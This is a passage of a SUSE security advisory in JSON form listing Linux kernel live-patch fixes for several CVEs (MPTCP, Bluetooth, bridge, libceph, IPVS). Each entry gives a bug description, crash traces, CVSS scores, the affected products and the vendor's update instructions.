"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n 
entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. 
fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
